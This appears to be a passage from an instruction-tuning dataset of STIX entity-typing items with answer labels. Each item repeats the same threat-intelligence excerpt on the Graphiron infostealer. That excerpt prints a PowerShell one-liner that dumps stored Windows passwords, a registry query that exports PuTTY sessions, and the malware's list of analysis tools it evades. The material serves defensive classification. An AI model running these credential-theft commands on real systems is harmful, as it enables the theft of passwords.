"input": "### Entity:\nCFF Explorer\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidaw64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ncheckip.amazonaws.com\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBurpSuiteFree\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nprocexp\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nhttpdebugger\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nreg.exe\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
